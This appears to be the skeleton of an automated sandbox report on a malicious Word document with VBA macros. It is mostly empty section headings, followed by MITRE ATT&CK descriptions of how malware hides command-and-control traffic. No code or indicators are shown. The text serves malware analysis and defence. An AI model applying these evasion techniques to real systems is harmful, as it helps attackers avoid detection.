HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Io8ic2291n.doc"

Indicators

Document Summary

Streams with VBA

VBA File Name: Bcur5699z4d, Stream Size: 1108

General

VBA Code Keywords

VBA Code

VBA File Name: Nst6otvnmgmpw, Stream Size: 17602

General

VBA Code Keywords

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre